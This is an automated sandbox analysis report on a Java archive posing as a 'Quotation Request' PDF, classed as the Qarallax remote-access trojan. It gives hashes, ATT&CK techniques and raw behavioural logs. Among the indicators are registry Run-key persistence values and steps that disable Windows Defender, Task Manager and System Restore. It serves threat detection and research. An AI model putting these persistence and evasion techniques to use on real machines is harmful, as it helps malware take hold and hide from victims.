qarallax | 8bcdae78528284a03c0a797472234561fd523be8a9a822f51f056cf8e72a1755

Analysis

max time kernel
131s
max time network
145s
platform
windows10_x64
resource
win10
submitted
18-08-2020 19:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Techno Group Pakistan Quotation Request_Pdf.jar
Size

403KB
MD5

fc115bb8e02dd12ad2e1f5b334174288
SHA1

9e41b33dc89f43e509ef4297f29934ef3a9c2945
SHA256

8bcdae78528284a03c0a797472234561fd523be8a9a822f51f056cf8e72a1755
SHA512

5cc026bc0eca4cf136a6614df24ed84e5cff65bb8558384d4f672db5cb0f40d9614e16c7e78873a871573f6c78951befb8020be9907ebad030e77ff6a32f47d8

Score

10^/10

persistence trojan qarallax evasion

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
QarallaxRAT
Qarallax is a RAT developed by Quaverse and sold as RaaS (RAT as a Service).
trojan qarallax

Qarallax RAT support DLL 1 IoCs

resource	yara_rule
behavioral2/files/0x000100000001ae57-56.dat	qarallax_dll

Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490
Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Loads dropped DLL 1 IoCs

pid	Process
2788	java.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\HfdZkYR = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\ujTBR\\NXtxm.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\HfdZkYR = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\ujTBR\\NXtxm.class\""	java.exe

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\ujTBR\Desktop.ini	java.exe
File created	C:\Users\Admin\ujTBR\Desktop.ini	java.exe
File opened for modification	C:\Users\Admin\ujTBR\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\ujTBR\Desktop.ini	attrib.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\cFnxt	java.exe
File opened for modification	C:\Windows\System32\cFnxt	java.exe

Kills process with taskkill 19 IoCs

evasion

pid	Process
2776	taskkill.exe
2688	taskkill.exe
4416	taskkill.exe
4156	taskkill.exe
4444	taskkill.exe
4852	taskkill.exe
4220	taskkill.exe
3740	taskkill.exe
4972	taskkill.exe
3800	taskkill.exe
3744	taskkill.exe
4900	taskkill.exe
4140	taskkill.exe
4424	taskkill.exe
3740	taskkill.exe
1860	taskkill.exe
4584	taskkill.exe
4308	taskkill.exe
4684	taskkill.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2716	powershell.exe
2716	powershell.exe
2716	powershell.exe
2716	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2788	java.exe

Suspicious use of AdjustPrivilegeToken 167 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	744	WMIC.exe
Token: SeSecurityPrivilege	744	WMIC.exe
Token: SeTakeOwnershipPrivilege	744	WMIC.exe
Token: SeLoadDriverPrivilege	744	WMIC.exe
Token: SeSystemProfilePrivilege	744	WMIC.exe
Token: SeSystemtimePrivilege	744	WMIC.exe
Token: SeProfSingleProcessPrivilege	744	WMIC.exe
Token: SeIncBasePriorityPrivilege	744	WMIC.exe
Token: SeCreatePagefilePrivilege	744	WMIC.exe
Token: SeBackupPrivilege	744	WMIC.exe
Token: SeRestorePrivilege	744	WMIC.exe
Token: SeShutdownPrivilege	744	WMIC.exe
Token: SeDebugPrivilege	744	WMIC.exe
Token: SeSystemEnvironmentPrivilege	744	WMIC.exe
Token: SeRemoteShutdownPrivilege	744	WMIC.exe
Token: SeUndockPrivilege	744	WMIC.exe
Token: SeManageVolumePrivilege	744	WMIC.exe
Token: 33	744	WMIC.exe
Token: 34	744	WMIC.exe
Token: 35	744	WMIC.exe
Token: 36	744	WMIC.exe
Token: SeIncreaseQuotaPrivilege	744	WMIC.exe
Token: SeSecurityPrivilege	744	WMIC.exe
Token: SeTakeOwnershipPrivilege	744	WMIC.exe
Token: SeLoadDriverPrivilege	744	WMIC.exe
Token: SeSystemProfilePrivilege	744	WMIC.exe
Token: SeSystemtimePrivilege	744	WMIC.exe
Token: SeProfSingleProcessPrivilege	744	WMIC.exe
Token: SeIncBasePriorityPrivilege	744	WMIC.exe
Token: SeCreatePagefilePrivilege	744	WMIC.exe
Token: SeBackupPrivilege	744	WMIC.exe
Token: SeRestorePrivilege	744	WMIC.exe
Token: SeShutdownPrivilege	744	WMIC.exe
Token: SeDebugPrivilege	744	WMIC.exe
Token: SeSystemEnvironmentPrivilege	744	WMIC.exe
Token: SeRemoteShutdownPrivilege	744	WMIC.exe
Token: SeUndockPrivilege	744	WMIC.exe
Token: SeManageVolumePrivilege	744	WMIC.exe
Token: 33	744	WMIC.exe
Token: 34	744	WMIC.exe
Token: 35	744	WMIC.exe
Token: 36	744	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3168	WMIC.exe
Token: SeSecurityPrivilege	3168	WMIC.exe
Token: SeTakeOwnershipPrivilege	3168	WMIC.exe
Token: SeLoadDriverPrivilege	3168	WMIC.exe
Token: SeSystemProfilePrivilege	3168	WMIC.exe
Token: SeSystemtimePrivilege	3168	WMIC.exe
Token: SeProfSingleProcessPrivilege	3168	WMIC.exe
Token: SeIncBasePriorityPrivilege	3168	WMIC.exe
Token: SeCreatePagefilePrivilege	3168	WMIC.exe
Token: SeBackupPrivilege	3168	WMIC.exe
Token: SeRestorePrivilege	3168	WMIC.exe
Token: SeShutdownPrivilege	3168	WMIC.exe
Token: SeDebugPrivilege	3168	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3168	WMIC.exe
Token: SeRemoteShutdownPrivilege	3168	WMIC.exe
Token: SeUndockPrivilege	3168	WMIC.exe
Token: SeManageVolumePrivilege	3168	WMIC.exe
Token: 33	3168	WMIC.exe
Token: 34	3168	WMIC.exe
Token: 35	3168	WMIC.exe
Token: 36	3168	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3168	WMIC.exe
Token: SeSecurityPrivilege	3168	WMIC.exe
Token: SeTakeOwnershipPrivilege	3168	WMIC.exe
Token: SeLoadDriverPrivilege	3168	WMIC.exe
Token: SeSystemProfilePrivilege	3168	WMIC.exe
Token: SeSystemtimePrivilege	3168	WMIC.exe
Token: SeProfSingleProcessPrivilege	3168	WMIC.exe
Token: SeIncBasePriorityPrivilege	3168	WMIC.exe
Token: SeCreatePagefilePrivilege	3168	WMIC.exe
Token: SeBackupPrivilege	3168	WMIC.exe
Token: SeRestorePrivilege	3168	WMIC.exe
Token: SeShutdownPrivilege	3168	WMIC.exe
Token: SeDebugPrivilege	3168	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3168	WMIC.exe
Token: SeRemoteShutdownPrivilege	3168	WMIC.exe
Token: SeUndockPrivilege	3168	WMIC.exe
Token: SeManageVolumePrivilege	3168	WMIC.exe
Token: 33	3168	WMIC.exe
Token: 34	3168	WMIC.exe
Token: 35	3168	WMIC.exe
Token: 36	3168	WMIC.exe
Token: SeDebugPrivilege	2776	taskkill.exe
Token: SeDebugPrivilege	2716	powershell.exe
Token: SeDebugPrivilege	3800	taskkill.exe
Token: SeDebugPrivilege	3740	taskkill.exe
Token: SeIncreaseQuotaPrivilege	2716	powershell.exe
Token: SeSecurityPrivilege	2716	powershell.exe
Token: SeTakeOwnershipPrivilege	2716	powershell.exe
Token: SeLoadDriverPrivilege	2716	powershell.exe
Token: SeSystemProfilePrivilege	2716	powershell.exe
Token: SeSystemtimePrivilege	2716	powershell.exe
Token: SeProfSingleProcessPrivilege	2716	powershell.exe
Token: SeIncBasePriorityPrivilege	2716	powershell.exe
Token: SeCreatePagefilePrivilege	2716	powershell.exe
Token: SeBackupPrivilege	2716	powershell.exe
Token: SeRestorePrivilege	2716	powershell.exe
Token: SeShutdownPrivilege	2716	powershell.exe
Token: SeDebugPrivilege	2716	powershell.exe
Token: SeSystemEnvironmentPrivilege	2716	powershell.exe
Token: SeRemoteShutdownPrivilege	2716	powershell.exe
Token: SeUndockPrivilege	2716	powershell.exe
Token: SeManageVolumePrivilege	2716	powershell.exe
Token: 33	2716	powershell.exe
Token: 34	2716	powershell.exe
Token: 35	2716	powershell.exe
Token: 36	2716	powershell.exe
Token: SeDebugPrivilege	2688	taskkill.exe
Token: SeDebugPrivilege	1860	taskkill.exe
Token: SeIncreaseQuotaPrivilege	3304	WMIC.exe
Token: SeSecurityPrivilege	3304	WMIC.exe
Token: SeTakeOwnershipPrivilege	3304	WMIC.exe
Token: SeLoadDriverPrivilege	3304	WMIC.exe
Token: SeSystemProfilePrivilege	3304	WMIC.exe
Token: SeSystemtimePrivilege	3304	WMIC.exe
Token: SeProfSingleProcessPrivilege	3304	WMIC.exe
Token: SeIncBasePriorityPrivilege	3304	WMIC.exe
Token: SeCreatePagefilePrivilege	3304	WMIC.exe
Token: SeBackupPrivilege	3304	WMIC.exe
Token: SeRestorePrivilege	3304	WMIC.exe
Token: SeShutdownPrivilege	3304	WMIC.exe
Token: SeDebugPrivilege	3304	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3304	WMIC.exe
Token: SeRemoteShutdownPrivilege	3304	WMIC.exe
Token: SeUndockPrivilege	3304	WMIC.exe
Token: SeManageVolumePrivilege	3304	WMIC.exe
Token: 33	3304	WMIC.exe
Token: 34	3304	WMIC.exe
Token: 35	3304	WMIC.exe
Token: 36	3304	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3304	WMIC.exe
Token: SeSecurityPrivilege	3304	WMIC.exe
Token: SeTakeOwnershipPrivilege	3304	WMIC.exe
Token: SeLoadDriverPrivilege	3304	WMIC.exe
Token: SeSystemProfilePrivilege	3304	WMIC.exe
Token: SeSystemtimePrivilege	3304	WMIC.exe
Token: SeProfSingleProcessPrivilege	3304	WMIC.exe
Token: SeIncBasePriorityPrivilege	3304	WMIC.exe
Token: SeCreatePagefilePrivilege	3304	WMIC.exe
Token: SeBackupPrivilege	3304	WMIC.exe
Token: SeRestorePrivilege	3304	WMIC.exe
Token: SeShutdownPrivilege	3304	WMIC.exe
Token: SeDebugPrivilege	3304	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3304	WMIC.exe
Token: SeRemoteShutdownPrivilege	3304	WMIC.exe
Token: SeUndockPrivilege	3304	WMIC.exe
Token: SeManageVolumePrivilege	3304	WMIC.exe
Token: 33	3304	WMIC.exe
Token: 34	3304	WMIC.exe
Token: 35	3304	WMIC.exe
Token: 36	3304	WMIC.exe
Token: SeDebugPrivilege	3744	taskkill.exe
Token: SeDebugPrivilege	4416	taskkill.exe
Token: SeDebugPrivilege	4156	taskkill.exe
Token: SeDebugPrivilege	4900	taskkill.exe
Token: SeDebugPrivilege	4444	taskkill.exe
Token: SeDebugPrivilege	4584	taskkill.exe
Token: SeDebugPrivilege	4852	taskkill.exe
Token: SeDebugPrivilege	4140	taskkill.exe
Token: SeDebugPrivilege	4220	taskkill.exe
Token: SeDebugPrivilege	4308	taskkill.exe
Token: SeDebugPrivilege	4424	taskkill.exe
Token: SeDebugPrivilege	4684	taskkill.exe
Token: SeDebugPrivilege	4972	taskkill.exe
Token: SeDebugPrivilege	3740	taskkill.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2788	java.exe

Suspicious use of WriteProcessMemory 416 IoCs

description	pid	Process	procid_target
PID 2788 wrote to memory of 2276	2788	java.exe	68
PID 2788 wrote to memory of 2276	2788	java.exe	68
PID 2788 wrote to memory of 3980	2788	java.exe	70
PID 2788 wrote to memory of 3980	2788	java.exe	70
PID 3980 wrote to memory of 744	3980	cmd.exe	72
PID 3980 wrote to memory of 744	3980	cmd.exe	72
PID 2788 wrote to memory of 3748	2788	java.exe	73
PID 2788 wrote to memory of 3748	2788	java.exe	73
PID 3748 wrote to memory of 3168	3748	cmd.exe	75
PID 3748 wrote to memory of 3168	3748	cmd.exe	75
PID 2788 wrote to memory of 3912	2788	java.exe	76
PID 2788 wrote to memory of 3912	2788	java.exe	76
PID 2788 wrote to memory of 3468	2788	java.exe	78
PID 2788 wrote to memory of 3468	2788	java.exe	78
PID 2788 wrote to memory of 632	2788	java.exe	80
PID 2788 wrote to memory of 632	2788	java.exe	80
PID 2788 wrote to memory of 804	2788	java.exe	81
PID 2788 wrote to memory of 804	2788	java.exe	81
PID 2788 wrote to memory of 1004	2788	java.exe	83
PID 2788 wrote to memory of 1004	2788	java.exe	83
PID 2788 wrote to memory of 1020	2788	java.exe	85
PID 2788 wrote to memory of 1020	2788	java.exe	85
PID 2788 wrote to memory of 1208	2788	java.exe	87
PID 2788 wrote to memory of 1208	2788	java.exe	87
PID 2788 wrote to memory of 1336	2788	java.exe	89
PID 2788 wrote to memory of 1336	2788	java.exe	89
PID 2788 wrote to memory of 2156	2788	java.exe	92
PID 2788 wrote to memory of 2156	2788	java.exe	92
PID 2788 wrote to memory of 2716	2788	java.exe	94
PID 2788 wrote to memory of 2716	2788	java.exe	94
PID 2788 wrote to memory of 2720	2788	java.exe	95
PID 2788 wrote to memory of 2720	2788	java.exe	95
PID 2788 wrote to memory of 2776	2788	java.exe	96
PID 2788 wrote to memory of 2776	2788	java.exe	96
PID 2788 wrote to memory of 3880	2788	java.exe	97
PID 2788 wrote to memory of 3880	2788	java.exe	97
PID 2788 wrote to memory of 1940	2788	java.exe	101
PID 2788 wrote to memory of 1940	2788	java.exe	101
PID 2788 wrote to memory of 508	2788	java.exe	103
PID 2788 wrote to memory of 508	2788	java.exe	103
PID 2788 wrote to memory of 3800	2788	java.exe	105
PID 2788 wrote to memory of 3800	2788	java.exe	105
PID 2788 wrote to memory of 992	2788	java.exe	106
PID 2788 wrote to memory of 992	2788	java.exe	106
PID 2788 wrote to memory of 556	2788	java.exe	110
PID 2788 wrote to memory of 556	2788	java.exe	110
PID 2788 wrote to memory of 844	2788	java.exe	111
PID 2788 wrote to memory of 844	2788	java.exe	111
PID 2788 wrote to memory of 3616	2788	java.exe	114
PID 2788 wrote to memory of 3616	2788	java.exe	114
PID 2788 wrote to memory of 1164	2788	java.exe	115
PID 2788 wrote to memory of 1164	2788	java.exe	115
PID 2788 wrote to memory of 2876	2788	java.exe	117
PID 2788 wrote to memory of 2876	2788	java.exe	117
PID 2788 wrote to memory of 2996	2788	java.exe	119
PID 2788 wrote to memory of 2996	2788	java.exe	119
PID 2788 wrote to memory of 3400	2788	java.exe	121
PID 2788 wrote to memory of 3400	2788	java.exe	121
PID 2788 wrote to memory of 1520	2788	java.exe	124
PID 2788 wrote to memory of 1520	2788	java.exe	124
PID 2788 wrote to memory of 2560	2788	java.exe	125
PID 2788 wrote to memory of 2560	2788	java.exe	125
PID 2788 wrote to memory of 1100	2788	java.exe	128
PID 2788 wrote to memory of 1100	2788	java.exe	128
PID 2788 wrote to memory of 2756	2788	java.exe	129
PID 2788 wrote to memory of 2756	2788	java.exe	129
PID 2788 wrote to memory of 3860	2788	java.exe	133
PID 2788 wrote to memory of 3860	2788	java.exe	133
PID 2788 wrote to memory of 396	2788	java.exe	134
PID 2788 wrote to memory of 396	2788	java.exe	134
PID 2156 wrote to memory of 2448	2156	cmd.exe	135
PID 2156 wrote to memory of 2448	2156	cmd.exe	135
PID 2788 wrote to memory of 3800	2788	java.exe	136
PID 2788 wrote to memory of 3800	2788	java.exe	136
PID 2788 wrote to memory of 1364	2788	java.exe	138
PID 2788 wrote to memory of 1364	2788	java.exe	138
PID 2788 wrote to memory of 2524	2788	java.exe	141
PID 2788 wrote to memory of 2524	2788	java.exe	141
PID 2788 wrote to memory of 3980	2788	java.exe	143
PID 2788 wrote to memory of 3980	2788	java.exe	143
PID 2788 wrote to memory of 1252	2788	java.exe	145
PID 2788 wrote to memory of 1252	2788	java.exe	145
PID 2788 wrote to memory of 1812	2788	java.exe	148
PID 2788 wrote to memory of 1812	2788	java.exe	148
PID 2788 wrote to memory of 3880	2788	java.exe	149
PID 2788 wrote to memory of 3880	2788	java.exe	149
PID 2788 wrote to memory of 3832	2788	java.exe	152
PID 2788 wrote to memory of 3832	2788	java.exe	152
PID 2788 wrote to memory of 2560	2788	java.exe	153
PID 2788 wrote to memory of 2560	2788	java.exe	153
PID 2788 wrote to memory of 3604	2788	java.exe	156
PID 2788 wrote to memory of 3604	2788	java.exe	156
PID 2788 wrote to memory of 1100	2788	java.exe	158
PID 2788 wrote to memory of 1100	2788	java.exe	158
PID 2788 wrote to memory of 3808	2788	java.exe	160
PID 2788 wrote to memory of 3808	2788	java.exe	160
PID 2788 wrote to memory of 508	2788	java.exe	162
PID 2788 wrote to memory of 508	2788	java.exe	162
PID 2156 wrote to memory of 472	2156	cmd.exe	164
PID 2156 wrote to memory of 472	2156	cmd.exe	164
PID 2788 wrote to memory of 1004	2788	java.exe	165
PID 2788 wrote to memory of 1004	2788	java.exe	165
PID 2788 wrote to memory of 636	2788	java.exe	167
PID 2788 wrote to memory of 636	2788	java.exe	167
PID 636 wrote to memory of 1748	636	cmd.exe	169
PID 636 wrote to memory of 1748	636	cmd.exe	169
PID 2788 wrote to memory of 3740	2788	java.exe	170
PID 2788 wrote to memory of 3740	2788	java.exe	170
PID 636 wrote to memory of 2124	636	cmd.exe	172
PID 636 wrote to memory of 2124	636	cmd.exe	172
PID 2788 wrote to memory of 3832	2788	java.exe	173
PID 2788 wrote to memory of 3832	2788	java.exe	173
PID 3832 wrote to memory of 3788	3832	cmd.exe	175
PID 3832 wrote to memory of 3788	3832	cmd.exe	175
PID 3832 wrote to memory of 3168	3832	cmd.exe	176
PID 3832 wrote to memory of 3168	3832	cmd.exe	176
PID 2788 wrote to memory of 3616	2788	java.exe	177
PID 2788 wrote to memory of 3616	2788	java.exe	177
PID 3616 wrote to memory of 3308	3616	cmd.exe	179
PID 3616 wrote to memory of 3308	3616	cmd.exe	179
PID 3616 wrote to memory of 2084	3616	cmd.exe	180
PID 3616 wrote to memory of 2084	3616	cmd.exe	180
PID 2788 wrote to memory of 900	2788	java.exe	181
PID 2788 wrote to memory of 900	2788	java.exe	181
PID 900 wrote to memory of 3304	900	cmd.exe	183
PID 900 wrote to memory of 3304	900	cmd.exe	183
PID 900 wrote to memory of 2988	900	cmd.exe	184
PID 900 wrote to memory of 2988	900	cmd.exe	184
PID 2788 wrote to memory of 1332	2788	java.exe	185
PID 2788 wrote to memory of 1332	2788	java.exe	185
PID 1332 wrote to memory of 4000	1332	cmd.exe	187
PID 1332 wrote to memory of 4000	1332	cmd.exe	187
PID 1332 wrote to memory of 3152	1332	cmd.exe	189
PID 1332 wrote to memory of 3152	1332	cmd.exe	189
PID 2788 wrote to memory of 1580	2788	java.exe	190
PID 2788 wrote to memory of 1580	2788	java.exe	190
PID 1580 wrote to memory of 2964	1580	cmd.exe	192
PID 1580 wrote to memory of 2964	1580	cmd.exe	192
PID 1580 wrote to memory of 740	1580	cmd.exe	193
PID 1580 wrote to memory of 740	1580	cmd.exe	193
PID 2788 wrote to memory of 2688	2788	java.exe	194
PID 2788 wrote to memory of 2688	2788	java.exe	194
PID 2788 wrote to memory of 1364	2788	java.exe	196
PID 2788 wrote to memory of 1364	2788	java.exe	196
PID 1364 wrote to memory of 1860	1364	cmd.exe	198
PID 1364 wrote to memory of 1860	1364	cmd.exe	198
PID 1364 wrote to memory of 752	1364	cmd.exe	199
PID 1364 wrote to memory of 752	1364	cmd.exe	199
PID 2788 wrote to memory of 3468	2788	java.exe	200
PID 2788 wrote to memory of 3468	2788	java.exe	200
PID 3468 wrote to memory of 4024	3468	cmd.exe	202
PID 3468 wrote to memory of 4024	3468	cmd.exe	202
PID 3468 wrote to memory of 2596	3468	cmd.exe	203
PID 3468 wrote to memory of 2596	3468	cmd.exe	203
PID 2788 wrote to memory of 1908	2788	java.exe	204
PID 2788 wrote to memory of 1908	2788	java.exe	204
PID 1908 wrote to memory of 3152	1908	cmd.exe	206
PID 1908 wrote to memory of 3152	1908	cmd.exe	206
PID 1908 wrote to memory of 3836	1908	cmd.exe	207
PID 1908 wrote to memory of 3836	1908	cmd.exe	207
PID 2788 wrote to memory of 3932	2788	java.exe	208
PID 2788 wrote to memory of 3932	2788	java.exe	208
PID 3932 wrote to memory of 2272	3932	cmd.exe	210
PID 3932 wrote to memory of 2272	3932	cmd.exe	210
PID 3932 wrote to memory of 1224	3932	cmd.exe	211
PID 3932 wrote to memory of 1224	3932	cmd.exe	211
PID 2788 wrote to memory of 1828	2788	java.exe	212
PID 2788 wrote to memory of 1828	2788	java.exe	212
PID 1828 wrote to memory of 3824	1828	cmd.exe	214
PID 1828 wrote to memory of 3824	1828	cmd.exe	214
PID 1828 wrote to memory of 572	1828	cmd.exe	215
PID 1828 wrote to memory of 572	1828	cmd.exe	215
PID 2788 wrote to memory of 2512	2788	java.exe	216
PID 2788 wrote to memory of 2512	2788	java.exe	216
PID 2788 wrote to memory of 1860	2788	java.exe	218
PID 2788 wrote to memory of 1860	2788	java.exe	218
PID 2512 wrote to memory of 752	2512	cmd.exe	220
PID 2512 wrote to memory of 752	2512	cmd.exe	220
PID 2512 wrote to memory of 3304	2512	cmd.exe	221
PID 2512 wrote to memory of 3304	2512	cmd.exe	221
PID 2788 wrote to memory of 2988	2788	java.exe	222
PID 2788 wrote to memory of 2988	2788	java.exe	222
PID 2988 wrote to memory of 3792	2988	cmd.exe	224
PID 2988 wrote to memory of 3792	2988	cmd.exe	224
PID 2988 wrote to memory of 540	2988	cmd.exe	225
PID 2988 wrote to memory of 540	2988	cmd.exe	225
PID 2788 wrote to memory of 2272	2788	java.exe	226
PID 2788 wrote to memory of 2272	2788	java.exe	226
PID 2272 wrote to memory of 1216	2272	cmd.exe	228
PID 2272 wrote to memory of 1216	2272	cmd.exe	228
PID 2788 wrote to memory of 3640	2788	java.exe	229
PID 2788 wrote to memory of 3640	2788	java.exe	229
PID 2272 wrote to memory of 752	2272	cmd.exe	231
PID 2272 wrote to memory of 752	2272	cmd.exe	231
PID 3640 wrote to memory of 3304	3640	cmd.exe	232
PID 3640 wrote to memory of 3304	3640	cmd.exe	232
PID 2788 wrote to memory of 3796	2788	java.exe	233
PID 2788 wrote to memory of 3796	2788	java.exe	233
PID 3796 wrote to memory of 3792	3796	cmd.exe	235
PID 3796 wrote to memory of 3792	3796	cmd.exe	235
PID 3796 wrote to memory of 540	3796	cmd.exe	236
PID 3796 wrote to memory of 540	3796	cmd.exe	236
PID 2788 wrote to memory of 3824	2788	java.exe	237
PID 2788 wrote to memory of 3824	2788	java.exe	237
PID 3824 wrote to memory of 808	3824	cmd.exe	239
PID 3824 wrote to memory of 808	3824	cmd.exe	239
PID 3824 wrote to memory of 848	3824	cmd.exe	240
PID 3824 wrote to memory of 848	3824	cmd.exe	240
PID 2788 wrote to memory of 1224	2788	java.exe	241
PID 2788 wrote to memory of 1224	2788	java.exe	241
PID 1224 wrote to memory of 808	1224	cmd.exe	243
PID 1224 wrote to memory of 808	1224	cmd.exe	243
PID 2788 wrote to memory of 3744	2788	java.exe	244
PID 2788 wrote to memory of 3744	2788	java.exe	244
PID 1224 wrote to memory of 4112	1224	cmd.exe	246
PID 1224 wrote to memory of 4112	1224	cmd.exe	246
PID 2788 wrote to memory of 4164	2788	java.exe	247
PID 2788 wrote to memory of 4164	2788	java.exe	247
PID 4164 wrote to memory of 4208	4164	cmd.exe	249
PID 4164 wrote to memory of 4208	4164	cmd.exe	249
PID 4164 wrote to memory of 4224	4164	cmd.exe	250
PID 4164 wrote to memory of 4224	4164	cmd.exe	250
PID 2788 wrote to memory of 4244	2788	java.exe	251
PID 2788 wrote to memory of 4244	2788	java.exe	251
PID 4244 wrote to memory of 4280	4244	cmd.exe	253
PID 4244 wrote to memory of 4280	4244	cmd.exe	253
PID 4244 wrote to memory of 4300	4244	cmd.exe	254
PID 4244 wrote to memory of 4300	4244	cmd.exe	254
PID 2788 wrote to memory of 4324	2788	java.exe	255
PID 2788 wrote to memory of 4324	2788	java.exe	255
PID 4324 wrote to memory of 4360	4324	cmd.exe	257
PID 4324 wrote to memory of 4360	4324	cmd.exe	257
PID 4324 wrote to memory of 4380	4324	cmd.exe	258
PID 4324 wrote to memory of 4380	4324	cmd.exe	258
PID 2788 wrote to memory of 4400	2788	java.exe	259
PID 2788 wrote to memory of 4400	2788	java.exe	259
PID 2788 wrote to memory of 4416	2788	java.exe	260
PID 2788 wrote to memory of 4416	2788	java.exe	260
PID 4400 wrote to memory of 4480	4400	cmd.exe	263
PID 4400 wrote to memory of 4480	4400	cmd.exe	263
PID 4400 wrote to memory of 4508	4400	cmd.exe	264
PID 4400 wrote to memory of 4508	4400	cmd.exe	264
PID 2788 wrote to memory of 4540	2788	java.exe	265
PID 2788 wrote to memory of 4540	2788	java.exe	265
PID 4540 wrote to memory of 4576	4540	cmd.exe	267
PID 4540 wrote to memory of 4576	4540	cmd.exe	267
PID 4540 wrote to memory of 4596	4540	cmd.exe	268
PID 4540 wrote to memory of 4596	4540	cmd.exe	268
PID 2788 wrote to memory of 4616	2788	java.exe	269
PID 2788 wrote to memory of 4616	2788	java.exe	269
PID 4616 wrote to memory of 4652	4616	cmd.exe	271
PID 4616 wrote to memory of 4652	4616	cmd.exe	271
PID 4616 wrote to memory of 4672	4616	cmd.exe	272
PID 4616 wrote to memory of 4672	4616	cmd.exe	272
PID 2788 wrote to memory of 4692	2788	java.exe	273
PID 2788 wrote to memory of 4692	2788	java.exe	273
PID 4692 wrote to memory of 4728	4692	cmd.exe	275
PID 4692 wrote to memory of 4728	4692	cmd.exe	275
PID 4692 wrote to memory of 4748	4692	cmd.exe	276
PID 4692 wrote to memory of 4748	4692	cmd.exe	276
PID 2788 wrote to memory of 4768	2788	java.exe	277
PID 2788 wrote to memory of 4768	2788	java.exe	277
PID 4768 wrote to memory of 4804	4768	cmd.exe	279
PID 4768 wrote to memory of 4804	4768	cmd.exe	279
PID 4768 wrote to memory of 4824	4768	cmd.exe	280
PID 4768 wrote to memory of 4824	4768	cmd.exe	280
PID 2788 wrote to memory of 4844	2788	java.exe	281
PID 2788 wrote to memory of 4844	2788	java.exe	281
PID 4844 wrote to memory of 4880	4844	cmd.exe	283
PID 4844 wrote to memory of 4880	4844	cmd.exe	283
PID 4844 wrote to memory of 4900	4844	cmd.exe	284
PID 4844 wrote to memory of 4900	4844	cmd.exe	284
PID 2788 wrote to memory of 4920	2788	java.exe	285
PID 2788 wrote to memory of 4920	2788	java.exe	285
PID 4920 wrote to memory of 4956	4920	cmd.exe	287
PID 4920 wrote to memory of 4956	4920	cmd.exe	287
PID 4920 wrote to memory of 4976	4920	cmd.exe	288
PID 4920 wrote to memory of 4976	4920	cmd.exe	288
PID 2788 wrote to memory of 4996	2788	java.exe	289
PID 2788 wrote to memory of 4996	2788	java.exe	289
PID 4996 wrote to memory of 5032	4996	cmd.exe	291
PID 4996 wrote to memory of 5032	4996	cmd.exe	291
PID 4996 wrote to memory of 5052	4996	cmd.exe	292
PID 4996 wrote to memory of 5052	4996	cmd.exe	292
PID 2788 wrote to memory of 5072	2788	java.exe	293
PID 2788 wrote to memory of 5072	2788	java.exe	293
PID 5072 wrote to memory of 5108	5072	cmd.exe	295
PID 5072 wrote to memory of 5108	5072	cmd.exe	295
PID 5072 wrote to memory of 1956	5072	cmd.exe	296
PID 5072 wrote to memory of 1956	5072	cmd.exe	296
PID 2788 wrote to memory of 4136	2788	java.exe	297
PID 2788 wrote to memory of 4136	2788	java.exe	297
PID 4136 wrote to memory of 4220	4136	cmd.exe	299
PID 4136 wrote to memory of 4220	4136	cmd.exe	299
PID 2788 wrote to memory of 4156	2788	java.exe	300
PID 2788 wrote to memory of 4156	2788	java.exe	300
PID 4136 wrote to memory of 4232	4136	cmd.exe	302
PID 4136 wrote to memory of 4232	4136	cmd.exe	302
PID 2788 wrote to memory of 4252	2788	java.exe	303
PID 2788 wrote to memory of 4252	2788	java.exe	303
PID 4252 wrote to memory of 2052	4252	cmd.exe	305
PID 4252 wrote to memory of 2052	4252	cmd.exe	305
PID 4252 wrote to memory of 4284	4252	cmd.exe	306
PID 4252 wrote to memory of 4284	4252	cmd.exe	306
PID 2788 wrote to memory of 4312	2788	java.exe	307
PID 2788 wrote to memory of 4312	2788	java.exe	307
PID 4312 wrote to memory of 4376	4312	cmd.exe	309
PID 4312 wrote to memory of 4376	4312	cmd.exe	309
PID 4312 wrote to memory of 4392	4312	cmd.exe	310
PID 4312 wrote to memory of 4392	4312	cmd.exe	310
PID 2788 wrote to memory of 4432	2788	java.exe	311
PID 2788 wrote to memory of 4432	2788	java.exe	311
PID 4432 wrote to memory of 4536	4432	cmd.exe	313
PID 4432 wrote to memory of 4536	4432	cmd.exe	313
PID 4432 wrote to memory of 4556	4432	cmd.exe	314
PID 4432 wrote to memory of 4556	4432	cmd.exe	314
PID 2788 wrote to memory of 4420	2788	java.exe	315
PID 2788 wrote to memory of 4420	2788	java.exe	315
